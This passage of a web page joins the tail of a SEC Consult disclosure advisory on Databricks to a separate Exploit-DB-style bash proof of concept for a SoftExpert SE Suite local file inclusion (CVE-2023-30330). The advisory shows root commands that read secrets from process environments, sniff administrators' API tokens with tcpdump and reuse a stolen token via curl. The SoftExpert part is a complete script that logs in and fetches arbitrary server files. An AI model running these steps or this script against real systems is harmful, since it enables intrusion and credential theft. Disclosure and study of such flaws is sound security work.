/>spark.databricks.cloudfetch.hasRegionSupport true<br />spark.databricks.unityCatalog.enabled true<br />spark.databricks.automl.serviceEnabled true<br />spark.databricks.cluster.profile singleNode<br />root@0121-111747-cmijb28n-10-139-64-4:/tmp#<br />===============================================================================<br /><br />In order to read secrets in the environment variables, an attacker would need<br />to access the environment of the right process. With root privileges, they are<br />able to access all processes' environments by reading the corresponding<br />/proc/<process-id>/environ file. 
For simplicity however, the right process-id<br />(888) was used in this POC:<br /><br />===============================================================================<br />root@0121-110521-h6l5h1n2-10-139-64-5:~# cat /proc/888/environ<br />SHELL=/bin/bash[...]<br />TERM=xterm-256color<br />USER=root<br />SPARK_PUBLIC_DNS=10.139.64.6<br />azure_keyvault_backed_secret_in_environment=<br />azure-keyvault-backed-secret-in-envionment-value <- THIS IS A SECRET<br />SPARK_LOCAL_DIRS=/local_disk0SHLVL=1<br />MASTER=local[4]<br />SPARK_HOME=/databricks/spark<br />SPARK_LOCAL_IP=10.139.64.6<br />MLFLOW_CONDA_HOME=/databricks/conda<br />CLASSPATH=/databricks/spark/dbconf/jets3t/:/databricks/spark/dbconf/log4j/driver:/databricks/hive/conf:/databricks/spark/dbconf/hadoop:/databricks/jars/*<br />SPARK_CONF_DIR=/databricks/spark/conf<br />SPARK_DIST_CLASSPATH=/databricks/spark/dbconf/log4j/driver:/databricks/jars/*<br />PYENV_ROOT=/databricks/.pyenv<br />DATABRICKS_LIBS_NFS_ROOT_PATH=/local_disk0/.ephemeral_nfs<br />SPARK_ENV_LOADED=1<br />DATABRICKS_CLUSTER_LIBS_ROOT_DIR=cluster_libraries<br />PATH=/databricks/.pyenv/bin:/usr/local/nvidia/bin:/databricks/python3/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin<br />DATABRICKS_LIBS_NFS_ROOT_DIR=.ephemeral_nfsSUDO_UID=0<br />DATABRICKS_CLUSTER_LIBS_PYTHON_ROOT_DIR=python<br />SPARK_SCALA_VERSION=2.12<br />MAIL=/var/mail/root<br />databricks_backed_secret_in_environment=<br />database-backed-secret-in-environment-value <- THIS IS A SECRET<br />SCALA_VERSION=2.10PTY_LIB_FOLDER=/usr/lib/libptyOLDPWD=/databricks/chauffeurSPARK_WORKE<br />===============================================================================<br /><br /><br />b) API Token leak and privilege escalation:<br /><br />Using a vulnerability initially found by Joosua Santasalo from Secureworks it is<br />possible to leak Databricks API tokens of other users, including administrators.<br />The previously proposed hardening technique "Use 
cluster types that support user<br />isolation wherever possible." does not mitigate the initial vulnerability, as<br />all compute cluster types are affected by our new vulnerability.<br />Source: https://www.databricks.com/blog/2022/10/10/admin-isolation-shared-clusters.html<br /><br />It is thereby possible to impersonate any user and to gain the privileges of a<br />workspace administrator.<br /><br />Using the previously established reverse shell, it is possible to capture<br />control-plane traffic with the following command. As soon as a task is started<br />with the administrative user, for example running a simple notebook, the token<br />is sent unencrypted and could be leaked.<br /><br />(Make sure to verify that you are on the correct cluster when reproducing the<br />issue using the global init script attack vector, since the user cluster will<br />also be attacked and send a shell too. This confused us more often than we<br />would like to admit.)<br /><br />===============================================================================<br />root@0121-110521-h6l5h1n2-10-139-64-5:~# /usr/sbin/tcpdump -i any -Aq | grep -i 'apiToken'<br />/usr/sbin/tcpdump -i any -Aq | grep -i 'apiToken'<br />tcpdump: verbose output suppressed, use -v or -vv for full protocol decode<br />listening on any, link-type LINUX_SLL (Linux cooked v1), capture size 262144 bytes<br />{"apiToken":"dkea****************************a107","procStartTime":53444,"commandOrigin":"PythonDriver","commandId":"7712608268853321788_7012126414451989966_5680a35d486f42ac922d461b93b8b7bf","notebookDir":"/Users/databricks-workspace-admin@redacted.onmicrosoft.com"}<br />apiToken<br />{"apiToken":"dkea****************************a107","procStartTime":85732,"commandOrigin":"PythonWorker","commandId":"7712608268853321788_7012126414451989966_5680a35d486f42ac922d461b93b8b7bf","notebookDir":"/Users/databricks-workspace-<br />. . 
.<br />===============================================================================<br /><br />This apiToken could then be used in the Databricks CLI or with the REST API<br />directly. The following example request needed administrative privileges to<br />succeed:<br /><br />===============================================================================<br />└─$ curl -s https://adb-redacted.2.azuredatabricks.net/api/2.0/secrets/scopes/list -H 'Authorization: Bearer dkea****************************a107' | jq<br />{<br /> "scopes": [<br /> {<br /> "name": "databricks-backed-secret-scope",<br /> "backend_type": "DATABRICKS"<br /> },<br /> {<br /> "name": "key-vault-backed-secret-scope",<br /> "backend_type": "AZURE_KEYVAULT",<br /> "keyvault_metadata": {<br /> "resource_id": "/subscriptions/714984c7-3ed0-4de2-b23b-9cffd28b74f7/resourceGroups/rg-databricks-proof-of-concept/providers/Microsoft.KeyVault/vaults/redacted-databricks-poc",<br /> "dns_name": "https://redacted-databricks-poc.vault.azure.net/"<br /> }<br /> }<br /> ]<br />}<br />===============================================================================<br /><br />Additional scenarios are possible once RCE is achieved, for example by using the<br />managed identity of the compute clusters to get an access token via the instance<br />metadata service at http://169.254.169.254/metadata/identity/oauth2/token.<br /><br /><br />Vulnerable / tested versions:<br />-----------------------------<br />The latest Databricks PaaS offering was tested on Azure as well as Amazon Web<br />Services (AWS) with the "Premium" pricing tier as of 2023-01-26.<br /><br /><br />Vendor contact timeline:<br />------------------------<br />2023-01-26: Contacting vendor PGP-encrypted through security@databricks.com<br />2023-01-26: Vendor acknowledged the email and is reviewing the reports<br />2023-02-15: Vendor confirms all vulnerabilities and is working on a solution<br />2023-03-29: Vendor proposes a solution<br />2023-05-02: 
Coordinated release of security advisory<br /><br /><br />Solution:<br />---------<br />Databricks disabled the creation of new workspaces using the deprecated init<br />script types and added support for initializing scripts in Workspace Files.<br /><br />The following solution for end users has been provided by the vendor:<br /><br />Legacy global init scripts:<br /><br />* Immediately disable legacy global init scripts (AWS [1] | Azure [2] ) if not actively<br /> used: it's a safe, easy, and immediate step to close this potential attack vector.<br /><br />* Customers with legacy global init scripts deployed should first migrate legacy<br /> scripts to the new global init script type (this notebook [3] can be used to automate<br /> the migration work) and, after this migration step, proceed to disable the legacy<br /> version as indicated in the previous step.<br /><br />[1] https://docs.databricks.com/clusters/init-scripts.html#migrate-legacy-scripts<br />[2] https://learn.microsoft.com/en-us/azure/databricks/clusters/init-scripts#migrate-legacy-scripts<br />[3] https://kb.databricks.com/legacy-global-init-script-migration-notebook<br /><br /><br />Cluster-named init scripts:<br /><br />* Cluster-named init scripts are similarly affected by the issue and are also deprecated:<br /> customers still using this type of init scripts should migrate them to cluster-scoped<br /> scripts and make sure that the scripts are stored in the new workspace files storage<br /> location (AWS [4] | Azure [5] | GCP [6]). This notebook [7] can be used to automate the migration work.<br /><br /><br />Cluster-scoped init scripts:<br /><br />* Existing cluster-scoped init scripts stored on DBFS should be migrated to the alternative,<br /> safer workspace files location (AWS [4] | Azure [5] | GCP [6] ). 
Going forward the default location of<br /> cluster-scoped init scripts in the product UI will be workspace files.<br /><br />[4] https://docs.databricks.com/files/workspace.html<br />[5] https://learn.microsoft.com/en-us/azure/databricks/files/workspace<br />[6] https://docs.gcp.databricks.com/files/workspace.html<br />[7] https://kb.databricks.com/cluster-named-init-script-migration-notebook<br /><br /><br />Legacy global init scripts and cluster-named init scripts will be disabled for all workspaces<br />on Sept 1, 2023. They will not function after this date.<br /><br /><br />Advisory URL:<br />-------------<br />https://sec-consult.com/vulnerability-lab/<br /><br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />SEC Consult Vulnerability Lab<br /><br />SEC Consult is part of Eviden, an atos business<br />Europe | Asia | North America<br /><br />About SEC Consult Vulnerability Lab<br />The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, part<br />of Eviden, an atos business. It ensures the continued knowledge gain of SEC<br />Consult in the field of network and application security to stay ahead of the<br />attacker. The SEC Consult Vulnerability Lab supports high-quality penetration<br />testing and the evaluation of new offensive and defensive technologies for our<br />customers. 
Hence our customers obtain the most current information about<br />vulnerabilities and valid recommendations about the risk profile of new<br />technologies.<br /><br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br />Interested in working with the experts of SEC Consult?<br />Send us your application https://sec-consult.com/career/<br /><br />Interested in improving your cyber security with the experts of SEC Consult?<br />Contact our local offices https://sec-consult.com/contact/<br />~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~<br /><br />Mail: security-research at sec-consult dot com<br />Web: https://www.sec-consult.com<br />Blog: http://blog.sec-consult.com<br />Twitter: https://twitter.com/sec_consult<br /><br />EOF Florian Roth, Marius Bartholdy / @2023<br /><br /></code></pre>
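One closing observation on the custom-spark.conf dump shown earlier in the Databricks advisory: the values of the spark.databricks.secret.*.keys.toRedact settings are simply the base64-encoded names of the secret keys (presumably the list of entries Databricks masks in redacted output), which can be verified offline:

```shell
# Decode the sparkConf.keys.toRedact values from custom-spark.conf;
# the envVar.keys.toRedact values decode the same way.
echo 'ZGF0YWJyaWNrcy1iYWNrZWQtc2VjcmV0' | base64 -d; echo          # -> databricks-backed-secret
echo 'YXp1cmUta2V5dmF1bHQtYmFja2VkLXNlY3JldA==' | base64 -d; echo  # -> azure-keyvault-backed-secret
```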
<pre><code># Exploit Title: SoftExpert (SE) Suite v2.1.3 - Local File Inclusion<br /># Date: 27-04-2023<br /># Exploit Author: Felipe Alcantara (Filiplain)<br /># Vendor Homepage: https://www.softexpert.com/<br /># Version: 2.0 < 2.1.3<br /># Tested on: Kali Linux<br /># CVE : CVE-2023-30330<br /># SE Suite versions tested: 2.0.15.31, 2.0.15.115<br /><br /># https://github.com/Filiplain/LFI-to-RCE-SE-Suite-2.0<br /># https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-30330<br /><br /><br />#!/bin/bash<br /><br /># Usage: ./lfi-poc.sh <domain> <username> <password> <file path><br /><br />target=$1<br />u=$2<br />p=$3<br /># Base64-encode the requested file path for the vulnerable parameter<br />file=$(echo -n "$4"|base64 -w 0)<br /><br />end="\033[0m\e[0m"<br />red="\e[0;31m\033[1m"<br />blue="\e[0;34m\033[1m"<br /><br />echo -e "\n$4 : $file\n"<br /><br />echo -e "${blue}\nGETTING SESSION COOKIE${end}"<br /># Content-Length is intentionally not set; curl computes it from --data-binary<br />cookie=$(curl -i -s -k -X $'POST' \<br /> -H "Host: $target" -H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0' -H $'Accept: */*' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate' -H $'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' -H $'X-Requested-With: XMLHttpRequest' -H "Origin: https://$target" -H "Referer: https://$target/softexpert/login?page=home" -H $'Sec-Fetch-Dest: empty' -H $'Sec-Fetch-Mode: cors' -H $'Sec-Fetch-Site: same-origin' -H $'Te: trailers' -H $'Connection: close' \<br /> -b $'language=1; _ga=GA1.3.151610227.1675447324; SEFGLANGUAGE=1; mode=deploy' \<br /> --data-binary "json=%7B%22AuthenticationParameter%22%3A%7B%22language%22%3A3%2C%22hashGUID%22%3Anull%2C%22domain%22%3A%22%22%2C%22accessType%22%3A%22DESKTOP%22%2C%22login%22%3A%22$u%22%2C%22password%22%3A%22$p%22%7D%7D" \<br /> "https://$target/softexpert/selogin"|grep se-authentication-token |grep "=" |cut -d ';' -f 1|sort -u|cut -d "=" -f 2)<br /><br />echo "cookie: $cookie"<br /><br />function LFI () {<br /><br />curl -s -k -X $'POST' \<br /> -H 
"Host: $target" -H "User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0" -H "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8" -H 'Accept-Language: en-US,en;q=0.5' -H 'Accept-Encoding: gzip, deflate' -H 'Content-Type: application/x-www-form-urlencoded' -H "Origin: https://$target" -H "Referer: https://$target/softexpert/workspace?page=home" -H 'Upgrade-Insecure-Requests: 1' -H 'Sec-Fetch-Dest: document' -H 'Sec-Fetch-Mode: navigate' -H 'Sec-Fetch-Site: same-origin' -H 'Te: trailers' -H 'Connection: close' \<br /> -b "se-authentication-token=$cookie; _ga=GA1.3.151610227.1675447324; SEFGLANGUAGE=1; mode=deploy" \<br /> --data-binary "action=4&managerName=lol&managerPath=$file&className=ZG9jX2RvY3VtZW50X2FkdmFuY2VkX2dyb3VwX2ZpbHRlcg%3D%3D&instantiate=false&loadJquery=false" \<br /> "https://$target/se/v42300/generic/gn_defaultframe/2.0/defaultframe_filter.php"<br /><br />}<br /><br />echo -e "${blue}\nExploiting LFI:${end}"<br />LFI<br /><br />function logout () {<br />curl -i -s -k -X $'POST' \<br /> -H "Host: $target" -H $'Content-Length: 0' -H $'Sec-Ch-Ua: \"Not_A Brand\";v=\"99\", \"Google Chrome\";v=\"109\", \"Chromium\";v=\"109\"' -H $'Accept: application/json, text/javascript, */*; q=0.01' -H $'X-Requested-With: XMLHttpRequest' -H $'Sec-Ch-Ua-Mobile: ?0' -H $'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36' -H $'Sec-Ch-Ua-Platform: \"Linux\"' -H "Origin: https://$target" -H $'Sec-Fetch-Site: same-origin' -H $'Sec-Fetch-Mode: cors' -H $'Sec-Fetch-Dest: empty' -H "Referer: https://$target/softexpert/workspace?page=home" -H $'Accept-Encoding: gzip, deflate' -H $'Accept-Language: en-US,en;q=0.9' -H $'Connection: close' \<br /> -b "se-authentication-token=$cookie; language=1; _ga=GA1.3.1890963078.1675081150; 
twk_uuid_5db840c5e4c2fa4b6bd8f89a=%7B%22uuid%22%3A%221.bJmDVb5PBlMumGNq2QO9gxk5hjdc6sp2pgENmao2hxHntg00r0qllmuXqCXTWG9uYLT1GkRDFuPY4ir63UIEJEXSS0pIJi8YlIvsB4edfrG1RTcS3CPr58feQBNf1%22%2C%22version%22%3A3%2C%22domain%22%3A%22$target%22%2C%22ts%22%3A1675081174571%7D; mode=deploy" \<br /> "https://$target/softexpert/selogout"<br />}<br /><br />echo -e "${blue}\nLogging out${end}"<br />logout >/dev/null<br />echo -e "\n\nDone!"<br /><br /><br /></code></pre>
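For reference (an illustration of ours, not part of the published script): the parameters the PoC sends to defaultframe_filter.php are plain base64. The file-path argument is encoded exactly as the script's $file variable does it, and the hard-coded className decodes to an SE Suite filter class name:

```shell
# Encode a file path the same way the PoC builds its managerPath value
echo -n '/etc/passwd' | base64 -w 0; echo   # -> L2V0Yy9wYXNzd2Q=
# Decode the hard-coded className parameter (%3D%3D is the URL-encoded '==')
echo 'ZG9jX2RvY3VtZW50X2FkdmFuY2VkX2dyb3VwX2ZpbHRlcg==' | base64 -d
# -> doc_document_advanced_group_filter
```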